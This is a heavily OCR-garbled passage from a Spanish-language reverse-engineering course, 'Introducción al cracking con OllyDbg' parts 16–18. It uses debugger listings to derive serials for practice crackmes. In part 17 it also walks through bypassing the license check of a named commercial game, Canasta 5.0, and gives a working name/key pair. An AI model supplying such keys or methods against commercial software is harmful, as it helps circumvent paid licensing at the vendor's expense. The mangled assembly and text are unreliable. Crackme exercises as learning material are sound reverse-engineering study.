Y si vemos que si el resto del primer byte hubiera sido 02 la comparación seria exitosa. 


En mi caso para hallar el resto 


39=5.0A +7 


Ya que el resultado de 39 dividido Oa daba 5 con resto 7, eso quiere decir que al multiplicar Oa por 5 me 
da 32 y al sumarle 7 me da 39 lo cual se ve reflejado en esa formula 


39=5 x0A +7 


Como el resto correcto debería ser dos para el caso del serial correcto 


BYTE CORRECTO=5x0A +2 
BYTE CORRECTO= 32 +2 = 34 


O sea 34 que es el numero 4 en ASCH 


También podemos ver que si al realizar 
BYTE CORRECTO= 5x 0A + 2 


Al realizar 5 x OA + 2 se pasa de los números posibles de una cifra (de 30 a 39) en ese caso es porque el 
resultado de la división no era cinco sino 4 por lo cual disminuimos y intentamos nuevamente con 


BYTE CORRECTO= 4 x 0A + RESTO 
Bueno ya calculamos nuestro primer byte es 34 o sea 4 en ASCII 


Vemos los otros bytes correctos que va a comparar con mis restos. 


faña Caña Caña Caña daña aña 


Con 02 ya calculamos 

Sigamos con 08 

BYTE CORRECTO=5x0A +8 

BYTE CORRECTO= 32 +8 

En este caso da 40 se pasa del máximo numero decimal que es 39 (9 en ASCHI) así que disminuyamos a 
BYTE CORRECTO= 4 x 0A +8 

BYTE CORRECTO= 28 + 8 = 30 que es 0 en ASCII 


Si hacemos la prueba vemos que 30 dividido OA da 4 con resto 8 


IT] DUO UU UU UU: DU UN UN UN) ne... .... 


Command 4* 0a +8 w | HEX: 30 - DEC: 48 - ASCII: 0 


Pues ya tenemos el segundo byte correcto que es 30 o sea 0 en ASCII 
Si realizamos lo mismo byte a byte 

El siguiente es 08, así que se repite lo mismo será 30 o sea 0 en ASCII 
El siguiente es 03 

BYTE CORRECTO=5x0A + 3 

BYTE CORRECTO= 32+ 3= 35 o sea el 5 en ASCII 

El siguiente es el 05 

BYTE CORRECTO=5x0A +5 

BYTE CORRECTO= 32+ 5= 37 o sea el 7 en ASCII 


El siguiente es 5 nuevamente, así que repite el 37 o sea 7 en ASCII 


El ultimo es 3 que ya sabíamos era 35 o sea 5 en ASCH 


Por lo cual el serial correcto para narvaja seria 4005775 quitando todos los BPM y BPX y dando RUN 


Splish, Splash EJumx] 


File Help 


Hard Coded: 
Check Hardcoded 


narvaja 


4005775 
Name/Serial Check 


Apreto el botón NAME/SERIAL CHECK 


Splish, Splash 


Good job, now keygen it. 


Otro adentro jeje 


El crackme para practicar por ahora será uno de solo serial hardcoded de a poco iremos aumentando por 
supuesto con el serial correcto se activa la parte 17, así que a buscar que este es muy fácil, el crackme es 
el MEXCRK1.ZIP y esta adjunto con la lección. 


Que tengan suerte así pueden llegar a la parte 17 


Ricardo Narvaja 
11 de diciembre de 2005 


INTRODUCCION AL CRACKING CON OLLYDBG PARTE 17 


Bueno antes que nada, vamos a solucionar el crackme MEXCRK1.ZIP pendiente que es muy 


sencillo. 
Abrámoslo en OLLYDBG y por supuesto para en el Entry Point 


[c] File View Debug Plugins Options Window Help 


ae x] eju] vj+] $6) ul +) 1]ejmt[wnH]c)/]k]8/R]: 


004, S£BEC MOV EBP,ESP 
. 8304 F4 ADD ESP, -8C 
MOU EAX, CRACK1. 00420640 


MOU EAX, DWORD PTR DS: [428410] 
MOU EAX, DWORD _PTR DS: CEAXI 


S£B00 
ES BCBOFFFF | CALL CRACK1. 00428808 
Eres 2904201 


ES 2078FDFF 
Al 10ER4200 


MOU ECx,DWORD PTR DS: [42EA88] 
MOU EAX, DWORD PTR DS: [42£8A10] 
£B00 Y , DS: [EAXJ 
8B15 SCO34201 MOU EDX, DWORD _PTR DS: [420350] 
ES ECBÓFFFF | CALL CRACK1. Ba42818 

Al 10ER4200 |MOU EAXx, DWORD PTR DS: [428810] 
£B00 MOU EAX, DWORD _PTR DS: CEAXI 

ES A?SCFDFF 
8049 00 


LEA EAX, DWORD_PTR_DS: [EAXI 
ADD EYTI 


CRACK1.0042F748 


CRACK1.B042D39C 


DD BYTE PTR DS: [EAXJ, AL 
(sls15]5) ADD BYTE PTR DS: [EAXJ,AL 
2699 ADO BYTE PTR DS: CEAXI,AL 


Veamos las strings referentes que utiliza el programa, haciendo click derecho 


Gu uu r 


Follow in Dump » 


rrrerrre 


La 


Name (label in current module Ctrl+r 


Search for 


Find references to > Name in all modules 
E E to executable sin ES 
pan A Sequence of commands CtrHe 
Constant 
Appearance » Binary string CtrHE 
All intermodular calls 
All commands 
All sequences 
All constants 
All switches 


v All referenced t 


Se ven entre las strings las siguientes 


UTE] MOLL ES 

B042D4F6 | ASCII "TFormi” 

00420507 | ASCII "crackme” 

00420537 | MOU EDx, CRACK1. 68420590 
00420543| MOU EDx, CRACK1. 68420594 
0042D0555| MOU EDx, CRACK1. 6842D5BC 
00420590 ASCII "Benadryl”, 8 
AR42N5A4 1 ASFTT "henna fade ANF”. A 


ASCII "Benadry l” 
ASCII "blrong Code DUDE” 
ASCII "Thanks you made ¡t” 


Podemos hacer click en la de correcto o en la de incorrecto, para ver la zona caliente. 


8D55 FC LEA EDx,DOWORD PTR SS: CEBP-4] 


39/|. 8B83 DCó610001 MOU EAX, DWORD_PTR DS: CEBX+1DCI 
BB42052F 1]. ES S54CCFEFF 
. 8B45 FC MOU EAX, DWORD PTR SS: CEBP-4] 
. BA 20054200 |MOU EDX, CRACK1. 66420590 
an4 . ES SF63FDFF 
60420541 | .-,74 12 
6b0420543/|. |[BA_A4DS4200 | MOV EDxX, CRACK1. 6042054 
66420548||. | 8B83 ESB10001 MOU EAX, DWORD _PTR DS: [EBX+1E8] 
. [ES 65CCFEFF 
.V|EB 10 
BA MOU EDXx, CRACK1. 00420580 


ECDS4200 
sBs3 ESO1000l MOU EAX, DWORD PTR DS: CEBX+1E8] 
ES S3CCFEFF 
3300 Z0R EAX, EAX 
POP EDX 


eo. y 


ASCII "Benadry l” 


ASCII "blrong Code DUDE” 


ASCII "Thanks you made ¡t” 


Vemos allí la zona caliente, un Call y dentro se decide ya que a la vuelta del mismo hay un JE 
que salta a WRONG CODE DUDE o a THANKS YOU MADE IT, o sea que es el salto decisivo. 


Pongo un BPX un poco antes del CALL en 42d534, y doy RUN 


Crackme 


5655 ULOLUDO: 
ES S54CCFEFF 
8B45 FC MOU EAX,OWORD PTR SS: [EBP-4] 
MOU EDx, CRACK1. 68420590 ASCII "Benadryl" 


EA 20054200 
74 12 


BA _A4D54200 |MOU EDx, CRACK1. 600420594 ASCII "blrong Code DUDE” 
3883 ESB10001 MOU EAX, DWORD _PTR DS: [EBX+1E8] 
ao PI es 

MOU EDx, CRACK1. 6042D05BC ASCII "Thanks you made it” 


BA _ECDS4200 
8883 ESB10001 MOU EAX, DWORD _PTR DS: [EBX+1E8] 
a 


MUY EH, DUWURDO FIN US: LEDATIULJ 


ES 


DO 
DE 
ys 


Ao 


JANO DNIMOo 


XOR EAXx, EAX 
nan rn 


a 


Si entro traceando dentro del CALL veo que compara mi serial falso Narvajita, con la string 
Benadry]l. 


bi 


2e0E 
e61F 


Y 


OU EBX, DWORD PTR D: 
cap EC EEN 


Pra mt 


y 


[Er MOU ECX,DWORD PTR DS: [ESI] 
É S: [EDI] 


EIP B04038F9 CRACK1.B04038F9 


nr PA ARAA mia MTC 


Bueno ya llegamos a la comparación, así que el serial correcto es la palabra Benadryl si damos 
RUN nuevamente quitando todos los BPXs 


Crackme 


Thanks you made it 


Allí vemos como nos felicita por haber hallado el serial correcto y felicitaciones porque si 
llegaron aquí también lo han sacado ustedes. 


Bueno vamos a hacer el ultimo user, name ya que en la próxima parte comenzaremos con un 
nuevo tema. 


Uno de los lectores de este curso, tuvo problemas con un programita que en realidad es un juego 
que se llama canasta 5.0 y que ira adjunto al tutorial. 


El me comentaba que se le quemaron los papeles porque siempre, en los tutes vemos casos de 
user y name que se ingresan apretando un botón y en este caso, solo hay que tipear y si lo que tipeas es 
correcto, el botón OK se habilita pues esta deshabilitado. 


Si instalamos el programa y vamos al about 


Canasta 5.0 Evaluation Version 
Game Options Network Buy AE 
Help Topics 


Canasta Home Page 
Order online 
Check for Upgrade... 


Buy Now - USD $19.95 


Y si vale 20 dolares amigo, jeje, oferta 19,95. 


Y About Canasta 


Canasta | Bitz and Pixelz | 


4 + Canasta for Windows 
a. Version 5.0 


Build 5.0.0.9 | 
Web Site 
http: +4www.canasta.net 


Support 
http: +4www.canasta.net/support php 


Licensed to: Evaluation Copy 
License key: Le 


Vemos el botón ENTER LICENSE 


ES 


Enter License Informalti... ll 


License Name [type exactly as specified) : 
O 


Cancel 


License Key (6 digits] The OK button 
becomes enabled 
when you enter a 
valid name and 

key combination. 


Allí dice que el botón OK se habilitara cuando se coloque la combinación correcta jeje. 


Arranquémoslo en OLLYDBG. 


[0] File View Debug EII SptEeE Window Help 


-10 
mou E 


MOU EDX, canasta. BB4ESFFO Sc "Canasta for llindows 
MOV EAX, DWORD_PTR DS: [4E8874] 


TEST _AL,AL 
MOU EDX, canasta. BB4E 9960 ASCII "Canasta” 


Comment 
664F7350/. 1 Import «Hot ivateKeyboardLayout 
BB4F734C!. i Import .AdjustWindowRectEx 
B04F7334|. i Import .BeginDeferlindowPos 
B04F7338/|. id Import .«BeginPaint 

BB4F7598 .i Import adi32.BitBlt 

BB4F782C |. 1 Import «Cal |NextHookEx 
BB4F7328 |. 1 Import «Cal lWindowProcA 
664F7340/. 1 Import .CharLowerA 

BB4F783C|. 1 Import .CharLowerBuffA 
BB4F7298|. 1 Import .CharNextA 

B04F7338 . i Import .CharNextA 

BB4F7348/. 1 Import .CharTo0emA 

064F7344 |. 1 Import .CharUpperBuffA 
BB4F73824 |. 1 Import . CheckMenu Item 
BB4F7320/. 1 Import hi ldWindowFromPoint 
004F7944 |. 1 Import ChooseColorA 
B04F7940 |. 1 Import ChooseFontA 
BB4F731C .i Import «ClientToScreen 
BB4F7318 .i Import CloseClipboard 
BB4F7284 |. 1 Import «CloseHandle 
6B64F744C |. 1 Import € CloseHandle 
664F7918|. 1 Import im: «ClosePrinter 
BB4F7388C |. i Import ole32,.Colreatelnstance 
B04F73894 |. 1 Import ) ,Colnitialize 
B04F7448|. id Import CompareStringA 
BB04F7594 .i Import adi 

BB4F73888 .i Import 

B04F73834 .i Import 

BB4F7390 .i Import 

BB4F7590 .i Import 

BB4F758C|. i Import 3 

BB4F7588|. 1 Import adi32.CreateCompatibleBitmap 
B04F7534 .i Import adi32.CreateCompat ibleDC 
BB4F7580/. 1 Import adi32,CreateDCA 

BB4F7578 |. 1 Import adi32,.CreateDIBitmap 
BB4F?7S7C|. 1 Import adi32,CreateDIBSect ion 
6004F7444 |. 1 Import = .CreateEventA 
BB4F7280|. id Import .CreateFileA 
B04F7440 |. 1 Import «CreateFileA 
BB4F7574 .i Import adi32.CreateFontIndirectA 


BB4F7570 |. i Import adi32.CreateHalftonePalette 
AAA TEL i Trarmamnt meli Parma ta TOM 


Uff la lista de apis es larguisima y las strings 


preeeeendl [PIAiS P I Pta | pS PS A 0 1 O A A O A A A A A A A a A 


Address | Disassemb ly | Text string 


M04B40ES5| ASCII "als-RTDI” 
004B40F1|ASCII "Error” 
004B4130/DD canasta. 100484170 
604B4150/DD canasta. B04B417C 
004B417D/ASCII "TLicense” 
M04B41383/DD canasta. B04841D4 
B04B41A8/DD_ canasta. B04841D4 
B04B41D05/ASCII "TLicenseManager” 
904B4204|M0U ESI,canasta. B04B423C 
caia El] Aisen cos 
y 
M04B4243|MOU EDX, canasta. 004B4370 
oras do 
"Settings»” 
AM4B43CF | MOU EDX, canasta. B04B446C 
o e 
ettingss”, 
004644384 |M0U ESI, canasta. 004B44A4 
cuestas El] apesar cos 
y 
904B462D| MOU EDx, canasta. 004B4690 
peas El nino goiened 000 
M04B46CF | MOU EDN canasta. BB4B46E8 
aio LL migrando 
e 
canasta 
004B4523| PUSH cohasta: BBABaSCe 
canasta 
004B4332| MOU_ ECX, canasta. 004B43E0 
a LE gor 
ma 
DIES el esiscacta ve 
M04B48BS|ASCII "User Name”, B 
A04B48CC|ASCII td 
A04B4SE0/|ASCII "CodePage”,B 
pana HOU EDX, canasta. BB4B49c4 
an canasta. 
iS 
canasta. 
M04B493A|MO0U ECX, canasta. 004B4A24 
al peta 
"mat ” 
Satora eel] greeiierecion Key" 
B04B49FC| ASCII "User Name”, B 
004B4A10/ASCII "CodePageEx”, a 
004B4A24/|ASC1II "CodePage”,B 
A04B4AC6|MOU EAX, canasta. B04B4B24 


064B4B24| ASCII "LICENSE INVALID”, 6 


M04B4BB3|MOU EDX, canasta. 00484070 
A04B4BE0|MOU EAX, canasta. BB4B4D9C 
A04B4C0A|MOU EAX, canasta. B64B4DA8 
A04B4C2D|MOU EAX, canasta. 064B4DA8 
004B4049|MO0U EAX, canasta. BB4B4DBC 
B0484D070|ASCII "http: www. canas” 
904B4D89| ASCII rta,net/keyohecke” 


ASCII 


ASCII 
ASCII 
ASCII 


ASCII 


ASCII 
ASCII 
ASCII 
ASCII 
ASCII 


638,”"TLicense” 
B8,"TLicense” 


BF,”"TLicensemanager” 
BF,"TLicenseManager” 


11,"Unregistered copy” 
Settings” 
"Settings»” 


"Settings»” 
"Settings ” 


11,"Unregistered copy” 


"Unregistered copy” 


"Unregistered copy” 


"Settings DateFormat” 
"Registration Key” 
"User Name” 
"CodePageEn” 
"CodePage” 


"Settings DateFormat” 


(Initial CPU selection) 


"User Name” 
"CodePageEn” 
"CodePage” 


"LICENSE INVALID” 


ad ¿canasta.netkeycheckers” 
"yyyymmzdd”” 

"yyyy/mmzdd”” 

"app=%sinamez%sipostf i=4stkey=%st instal 


Hay por ahí algunas pero obviamente el botón OK se debe habilitar y si no, no muestra nada así 


que el tema de las strings lo dejamos jeje. 


Enter License Informati... El X 


License Name [type exactly as specified] 


License Key [6 digits) 


Cancel 


The OK. button 
becomes enabled 
when pou enter a 
valid name and 
key combinatior. 


Corramos el OLLYDBG y lleguemos hasta la ventana de registración y veamos cual es uno de 


los métodos de ataque este tipo de protección. 


Enter License Informati... la Ex] 


License Name (type exactly as specified) 


OR 


RicardoNarvaja | 
Cancel 


License Key (6 digits) The OK button 
becomes enabled 


when you enter a 
valid name and 
key combination. 


Tipeo un nombre, supongo que aceptara cualquier nombre si no veremos mas adelante, ahora 
tipearé una LICENSE KEY rara, de 6 letras pongámosle WMYXSZ, apreto la W 


Enter License Informati... 12 1Kx] 


License Name (type exactly as specified) 


RicardoNarvaja 


Cancel 


License Key [6 digits) The OK button 
becomes enabled 


wi when you enter a 
valid name and 
key combination. 


Ahora apreto la M 


Enter License Informalti... la JKx] 


License Name (type exactly as specified) 


OR 


| RicardoNarvaja 
Cancel 


License Key [6 digits] The OK button 
becomes enabled 


¡6 when you enter a 
valid name and 
key combination. 


Ya apreté dos letras que pasa si busco en la memoria la string WM 


YU AL YY U A 


Apreto el botón M para ira VIEW-MEMORY y busco la string WM 


Enter binary string to search for 
ASA TE) 
UNICODE A) 


HEX +02 E 4D 


<] 
Cancel | 


En este caso habilito con la tilde CASE SENSITIVE para que busque exacto WM solo mayúsculas, así 
hay menos ocurrencias. 


3 


[4 Entire block 
IV Case sensitive 


[D] File View Debug Plugins Options Window Help 


25p,0P,BA,.on be 
comes enabled wh 
en you enter a Y 

alid name and ke le 
y combination..F 

ont. Charset-*DEF 
AULT_CHARSET. Fon 
t.Color:=clBlack 
¿Font.HeightOsS.F 
ont.Name*.MS San 
s Serif.Font.Sty 
leg. .ParentFontB 
72|BlordWlrap. . . . TGr 


Luego de que para dos o tres veces en palabras que comienzan con WM, y que sigo buscando con 
CTRL+L y si termina una sección salgo y sigo buscando mas abajo en la ventana M, llego a esta 
ocurrencia que muestra WM en mayúscula y solo, y además abajo esta el texto que muestra de que se 
habilitara el botón OK cuando apretemos el serial correcto. 


Busquemos esta zona en el dump 


Recordemos que a las direcciones que comienzan con letra, como en este caso la C debemos ponerle un 
cero delante si no el OLLYDBG no las reconocerá. 


Para estar seguros que esta es la zona donde va guardando el serial, escribamos el siguiente carácter del 
serial WMYXSZ, o sea tipeo la Y. 


Enter License Informati... 12 x] 


License Name (type exactly as specified) 


| RicardoNarvaja 
Cancel 


License Key [6 digits) The OK button 
becomes enabled 


wMvy when you enter a 
nn valid name and 
key combination. 


Al tipearla, veo en el dump que se agrego y que halle la zona donde va guardando el serial, por lo tanto, 
pongamos allí un BREAKPOINT MEMORY ON ACCESS que abarque 6 cifras ya que sabemos que son 


Backup » 
Copy » | 
Binary » 

» 


Breakpoint 
9 £ Search for » | Memory, on write 


Ahora doy RUN 


Enter License Informati... 2 |'X 


License Name (type exactly as specified) = 
0 


RicardoNarvaja 
Cancel 


License Key [6 digits] The OK button 
becomes enabled 

WMY when you enter a 
valid name and 
key combination. 


Me aparece la ventana pongo el carácter siguiente que es X. 


REP MOUS DWORD PTR ES: [EDIJ,DWORD PTR DS: [ESI] 
MOU ECX, EAX 

AND ECx,3 

ADD ESI,3 

EDI,3 

REP MOUS BYTE PTR ES:[EDIJ,BYTE PTR DS: [ESI] 


POP EDI 
POP ESI 


RETN 

PUSH EBX 
PUSH ESI 
PUSH EDI 
PUSH EBP 


, BBBBBBO4 
; BBOGBBO1 
; BBC3SDF9 ASCII "ny" 
; BBBBBBD4 
SP BB12E9A4 

' BB12E9D3 
B0C13544 
BOC3SDF9 


( 


le 


bit BLFFFFFFFF) 
hit AÍFEFFFEFFI 


Dal asaooons 
7 ea 
4 


.« 3309 XOR ECX, ECX 

. SABE MOU CL,BWTE PTR DS: [ESI] 

41 INC ECX 

. F3:A4 REP MOUS BYTE PTR ES:[EDIJ,BWTE PTR DS: [ESI] 
.« 28F0 MOU ESI,EAX 

+ SDBD FFFEFFFI LEA EDI,DWORD PTR SS: [EBP-101] 

. 3309 OR ECX, ECX 

. SABE MOU CL,BYTE PTR DS: [ESI] 

. 41 INC ECX 


BBC3SCFS ASCII ME, ”RicardoNarva: 
00000004 
BBC3S5DFS 
BBC1SAES 
P 0012E690 
' ABLZE99C 


J4BIESC 


l% 
MFFFFFFFF) 
MLFFFFFFFF) 
D(FFFFFRFFR) 


y 


mmnmn 


30 
a 
a 

30 


14 AR 11 ARAN AR AR AR 


Ya que el BREAKPOINT MEMORY ON ACCESS lo tenemos usando, podemos colocar un 
HARDWARE BPX ON ACCESS 


Memory, on access 
Memory, on write 
Remove memory breakpoint 


Search for  » 
Go to » 


Hex » 
Text » Hardware, on write 
Short > Hardware, on execution 
Long » 
Please * 

XOR ECX, ECX 

ARNES ERO BVTE PTR DS: [ESI] 


REP 
FFFEFFFICMP BYTE PTR SS: [EBP-101],0 


BE,"RicardoNarvaja” 


04, "MVR 
"HLE" 


Dn 5 An DD 


fRicardo 
Narvaja. 


EME 52 69 63 61 72 64 EF 
4E 61 72 76 61 6A 6l Bn 


Ea 24 ERA 12 00 F4 EA 12|. 
A AS An nt. 77 RAR? 14 Al 


. F3:A4 
- S0BD FFFEF 
¿y BF34 F60000B 


F3:A4 REP MOUS BYTE PTR_ES:[EDIJ,BYTE PTR DS: [ESI] 
3080 Fcososol JE. BYTE PTR SS: [EBP-1011,0 
JE canasta. B04B3FB0 


v 0FS4 F600BBa 
8D85 FFFEFFFÍLEA EAXx, DWORD PTR_SS: CEBP-161] 
BA 50404800 |[MOU EDxX, canasta. 004B405C 

XOR ECX, ECX 

MOU CL, BYTE PTR DS: [EAX] 

INC ECX 


41 

ES E9F2F4FF 
v BF84 DEOOODA 

2085 _FFFEFFFI ON EAX, DWORD PTR 25s yt 

Ba Sesedeos | Y ED» canasta. BB4B 


MOR ECX 
3A03 MOU CL, BOTE PTR DS: [EAXI 
INC ECXx 


ES CEF2F4FF 

v BFS4 COBOBAn 
3035 _FFFEFFF 
BA 623404200 
3309 

2A08 

41 
ES BSF2F4FF 

v BF34 ASOBBBO 
8035 FFFEFFFI 
BA 70404200 


3309 
3A0s 


41 
ES 98F2F4FF 


LEA EAX, DWORD PTR_SS: [EBP-101] 
MOU EDX, canasta. 60484068 

XOR ECX, ECX 

MOU CL,BYTE PTR DS: [EAX] 
INC_ECK 


o) EAX, DWORD PTR_SS: [EBP-101] 
MOU EDX, canasta. 004B4070 

XOR ECX, ECX 

Do EL BYTE PTR DS: [EAXI 


: 8DSR REREFEFILEA EA-DUORO PYR, 995 LEBP-1911 


REP MOUS BYTE PTR ES:[EDIJ,BYTE PTR DS 
P : 11,60 


IS 


hoUS BYTE PTR_ES:[EDIJ,BYTE PTR DS: [ESI] 


ASCII 63,”TNO" 


ASCII 65,”afdad” 


ASCII 05, "Gauss” 


ASCII 16,”STaRDoGG CHaMPioN PC97" 


Luego vienen comparaciones del nombre con personas que están en la lista negra, o sea mejor no ser 
TNO, afdad etc jeje. 


Al dar RUN nuevamente 


B044831C0 
6a4A31C2 


MOU EB%, DWORD PTR DS: [EDX1 


CcHaP Eco EBX 


pd ECx, DWORD PTR DS: [EAXx] 
DEC ESI 


a 1 


4 
69 
E ASCII ”H ¡E 


BO12E99C 
po00BBaani 
BO12ESAA 


BO4B31C04 canasta. 0403104 


CO ES 0623 32bit O(FFFFFFFF) 
P BCS 061B S2bit B(FFFFFFFF) 


1 CS 1202 20h i+ Mí CECECCCEE! 


Y podemos probar si es el serial correcto quitando todos los BPM y BPX y HARDWARE BPX 


Enter License Informati... 12 JKx] 


License Name (type exactly as specified) 


esla] 
| RicardoNarvaja | 


License Key (6 digits] The OK. button 
becomes enabled 


354910 when you enter a 


valid name and 
key combination. 


lo 


Al colocarlo se habilito el botón y al apretarlo estamos registrados jeje, otra opción que no voy a 
detenerme a explicar aquí, pero no es muy difícil, es usar WM_KEYUP cosa de que cada vez que 
apretamos una tecla pare OLLYDBG y podamos seguir el valor del byte que tipeamos, aunque 
lógicamente es mas engorroso, este método si nos funciona es mucho mas sencillo. 


Bueno los dejo descansar un poco, la próxima parte ya veremos un poco mas de teoría, acompañada de 
ejemplos para poder ir avanzando mas en conocimientos lo cual derivara en programas mas complejos 
resueltos. 


Hasta la parte 18 
Ricardo Narvaja 
15 de diciembre de 2005 


INTRODUCCIÓN AL CRACKING CON OLLYDBG PARTE 18 


Bueno, en la parte anterior había comentado que iba aquí a empezar otro tema que seria el tema de la 
detección del OLLYDBG, por los programas que ejecutamos en el, lo que comúnmente se llama 
antidebugging, como evitarlo manualmente, y con los plugins disponibles en cada caso y con ejemplos. 


Pero eso con ese tema comenzare en la parte 19, ya que surgió entre varios seguidores del curso que me 
escribieron al mail, el pedido de que haga un ejemplo mas de crackme sin botones, como el de la parte 


anterior, y si es posible usando la otra técnica la de WM_KEYUP . 


Bueno así que usaremos un crackme que me facilito Stzwei, gracias por el mismo, llamado 


crackme_4stz.exe y que por supuesto estará adjunto con este tutorial. 


Abramos el crackme en OLLYDBG 


=r>o--- 


O ORO OO 


SBEC 
38304 F4 


ES p4324500 
Es CCDBFAFF 
Ai CCAS4500 


3800 
ES EC97FEFF 
3B0D_2CA6450M1 


Ai 
300 


5 247E4501 MOU EDx, DWORD PTR DS: [457E84] 


s3B1 
ES ECSOPFEFF 
Ai CCAS4500 


3600 
ES 6B9SFEFF 
ES 2BB4FAFF 


ax] q 943 40) 3 mm xr]: 


PUSH _EBP 

MOU EBP,ESP 

ADD ESP, -6C 

MOV EAX, crackme_. 00453204 


MOV EAX, DWORD PTR DS: [45ASCCI 
MOU EAX, DWORD PTR DS: [EAX] 
MOV ECX, DWORD PTR DS: [454690] crackme_.0045B87C 
MOU EAX, DWORD PTR Du [45A5CCI 

MOU EAX, DWORD PTR DSELEA*xI 
crackme_.00457ED0 


MOU EAX, DWORD PTR DS: [45ASCCI 
MOU EAX, DWORD PTR DS: [EAXI 


LEA EAX, DWORD_PTR_DS: [EAXJ 


ADD EYTE PTR DS: [EAX], AL 
ann RYTE PTR NS=FFOY1 al 


Allí esta parado en el Entry Point, veamos las strings referentes ya que no esta empacado. 


vTE PTR DS: CEAXI, AL 


CDEF 


Run trace 


New origin here 
Go to 
Follow in Dump 


Search for 


Find references to 
View 

Copy to executable 
Analysis 


Appearance 


CtrHGray * 


FF4 
OB12FFFS 
0B12FFFC 


Uk 
» EFL 
STE 
sTi 


Name (label) in current module Ctrl 
Name in all modules 


rr y y vi 


Command Ctrl 
Sequence of cormmands Ctrl 
Constant 

»| Binary string Ctrl 


All intermodular calls 
All cornmands 

All sequences 

All constants 

All switches 


User-defined label 


Allí vemos las Strings que usa el programa 


aex] e jl] visi $0) e] + 1/ElmT]¡wH]c)/]K]8]R]-.Js] i3/?| 


Address 

10401006 
BO40101B 
Bo401021 
BO40102E 
pBo401042 
BO040105A 
BO40106E 
B0401052 
pbo401088 
0401098 
0401005 
DO4010E2 


po0401178 
p0401198 
pu4B11C5 
90461105 
BO4B2E04 
10402635 
DO4B2B34 
1B402B94 
DO402BAD 
10403747 


BO4B38C7 
10403807 
Bu4n4C99 
BO4B4CA9 
B0404E03 
BO4B4E15 
DO4B4E28 
DB4B4ESC 
DO4D4E7A 
DO4D4FES 


pO40Ss661 
pa4uss7C 
pO40S336 


Disassembl 

ASCII "Boolean" 
ASCII "False" 

ASCII "True" 

ASCII "Char" 

ASCII "Integer” 
ASCII "Byte” 

ASCII "blord” 

ASCII "String” 

DD crackme_.904019D4 
DD _cracknme_.004810D4 
ASCII "TObject” 
ASCII "TObject” 

DD crackme_ 00401004 
ASCII "System” 


4 
ASCII »TUnkhown" 
| ASCII "System” 


DD crackme_.9049011C4 

DD _crackme_.004011C4 
ASCII "TInterfacedObjeo” 
ASCII "t” 

PUSH crackme_. 00402634 
PUSH crackme_ . 004B02BA0 
ASCII ”"SOFTWAREsBor land" 
ASCII "De lphisRTL”, 
ASCII "FPUMaskValue"”,B 
MOU EBX, crackme_ . 00459830 
MOU EDX, crackme_. 00459020 
PUSH orackme_ . 00459040 
PUSH _crackme_. 00459020 
ASCII "Portions Copyrig” 
ASCII "ht (0) 1983,99 E” 
ASCII "orland”, 0 

PUSH crackme_.b0404E05 
PUSH crackme_.00404E18 
ASCII "kernel32.d11”,0 
ASCII "GetLongPathNameA” 
ASCII BA 

PUSH crackme_.00404FES 
PUSH crackme_.D0405004 
ASCII "SoftwarerBor land” 
ASCII "sLocales”, 0 

ASCII "SoftwarewBor Lang” 


4 ¡ASCII "sDelphisLocales”,B 


CMP DWORD PTR DS: [EB%+43, 10000 
MOU EDX, crackme_. 00459064 

ASCII ” e a 

ASCII "ar 


Text_strin 


Nada interesante por aquí, veamos las apis 


AN 


8BEC 
8304 F4 
BS 


ES CCOBFAFF 
Al CCAs45an 


8600 
ES EC97FEFF 
SB9D 2CA64501 


3B00 


8B15 847E4501 
ES ECO7FEFF 
Al CCAS4500 


8800 
ES 6B9SFEFF 
ES 2BB4FAFF 


. 8D48 Ba 
0 


3 


MOU EBP,ESP 
E ESP, -8C 


OY Es crackr 
MOU EAX, DWORD 
JU EAX, DWORD: 


MOU ECX, DWORD 


MOU EAX, DWORD 
MOU EAX, DWORD 


MOU EDX, DWORD 
MOU EAX, SUDRO 


JU EAX, DWORD 


Backup 
Copy 
Binary 
Assemble 
Label 
Comment 
Breakpoint 
Hit trace 
Run trace 


EAX, DWORD 


Go to 
Follow in Dump 
View call tree 


m 
+ 
E] 


Find references to 


Space 


CtrHK 


B7,"TObject” 
B?,”"TObject” 


B7,”TObject” 


11,"TInterfacedObjeot” 
11,"TInterfacedObjeot” 


”SOFTWARE+Bor Land*De | ph i3RTL” 
"FPUMaskVa lue” 


"at 00000990” 
"Runtime error 
"Error” 

"Runtime error 


at 00BBBBa0O” 
at 00BBBBa0” 


"kernel32.dl 1” 
"GetLonsgPathNamen” 


"SoftwareBor landwLocales” 
"Software“Bor landwDe lphisLocales” 


ÚUNICODE "ALLUSERSPROFILE=C: “Documents and SettingsrAll Users” 
ASCII 20,” ” 


$5 05599] 1+5] 1 1008 HE 90 0 10 10 0 10 5 1 E E A E=1 1 


¿+ BO4EBS7C 


¿+ BO457EDO 


Name in all modules 


Xx] PJ] »i+i $0 9] + LJEJM B|R]»-.] 5 
iddress [Section [Type [ Name [ Comment 


3045C600| . ¡data Import 
JD45C5FC| . idata Import 
3045C5FS| .idata | Import 
3045C5F4| .idata | Import 


3045C5FO|.idata | Import ispatchMessageA 
IM4SCSEC| .idata | Import DrawEdge 
J04SCSES|. idata Import DrawFrameControl 
JB45C5E4 |. ¡data Import DrawIcon 
3045C5EO| . idata Import DrawIconEx 
3045C5DC|.idata | Import DrawhHenuBar 
3045C5D8|.idata | Import DrawTewtA 
3045C5D4|.idata | Import Enab lehenu Item 
3045C5D0|.idata | Import EnableScrol lBar 
3B45C5CC|.idata | Import Enab Lellindow 
3I045C5C8S|. idata Import ndPaint 


JD45COFC| . idata Import 
3045C2C0|.idata | Import 
3045C2BC|.idata | Import d 
3045C5C4|.idata | Import EnumThreadWindows 
3045C5CO| .idata | Import Enunblindows 
3045C5EC|. idata | Import EqualRect 
3045C3A4 |. ¡data Import < cludeClipRect 
3045C164| .idata Import 
3045C5BS| .idata | Import 
3045C160| .idata | Import 
3B4S5C1SC| .idata | Import 
3045C2B8| .idata | Import 


.EnterCriticalSection 
.EnterCriticalSection 
.«EnumCalendarInfoA 


FindClose 
indFirstFileA 
indResourceA 


k 

k 
3045C5B4|.idata | Import 1 dWindowA 
3045C2B4|. ¡data Import k + FormatMessageA 
3045C5BB|. ¡data Import us FrameRect 
3045C158| .idata | Import |ke . FreeLibrary 
3045C2B0|.idata | Import [ke .Freel ibrary 
3045C2AC|.idata | Import ke «FreeResource 
3045C3A8|.idata | Import < «GdiF lush 
3M4SCSAC| .idata | Import |: GetAct ¡vellindow 
3I045C39C|. idata Import «GetBitmapBits 
30450398 |. ¡data Import GetBrushOrgEx 
3045C5A8|.idata | Import GetCapture 

GetClassInfoA 


3045C5A9| .idata | Import 
3M45C59C | .idata | Import 
30450394 | .idata | Import 


GetClientRect 
GetClipboardData 
tClipBox 


( 
